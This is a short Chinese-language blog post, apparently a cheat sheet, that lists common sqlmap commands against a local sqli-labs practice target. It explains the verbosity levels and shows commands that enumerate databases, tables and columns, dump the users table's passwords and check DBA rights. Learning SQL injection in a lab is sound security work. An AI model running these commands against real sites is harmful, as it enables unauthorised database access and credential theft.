sqlmap常用语句

Posted H2OH2OH2O

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap常用语句相关的知识,希望对你有一定的参考价值。

如果你想观察sqlmap对一个点是进行了怎样的尝试判断以及读取数据的,可以使用-v参数。

共有七个等级,默认为1:

0、只显示python错误以及严重的信息。

1、同时显示基本信息和警告信息。(默认)

2、同时显示debug信息。

3、同时显示注入的payload。

4、同时显示HTTP请求。

5、同时显示HTTP响应头。

6、同时显示HTTP响应页面。

如果你想看到sqlmap发送的测试payload最好的等级就是3。

 

1、python sqlmap.py -u "http://192.168.43.70/sqli-labs/Less-1/?id=1" -v 1 --dbs  爆库

 

2、python sqlmap.py -u "http://192.168.43.70/sqli-labs/Less-1/?id=1" -v 3 --tables -D security  爆表

 

3、python sqlmap.py -u "http://192.168.43.70/sqli-labs/Less-1/?id=1" -v 3 --columns -D security -T users  爆列名

 

 

4、python sqlmap.py -u "http://192.168.43.70/sqli-labs/Less-1/?id=1" -v 3 --dump -C id,password,userame -D security -T users  爆内容

 

 

 

5、python sqlmap.py -u "http://192.168.43.70/sqli-labs/Less-1/?id=1" --is-dba  判断当前用户是否为dba

 dba权限即管理员权限

 

以上是关于sqlmap常用语句的主要内容,如果未能解决你的问题,请参考以下文章

sqlmap使用过程中的常用命令

SQL注入原理和Sqlmap常用指令

sqlmap爆库名时选择的注入方式

sqlmap 命令详解(自备速查)

关于拼接SQL语句sqlMap的使用方法

SqlMap常用参数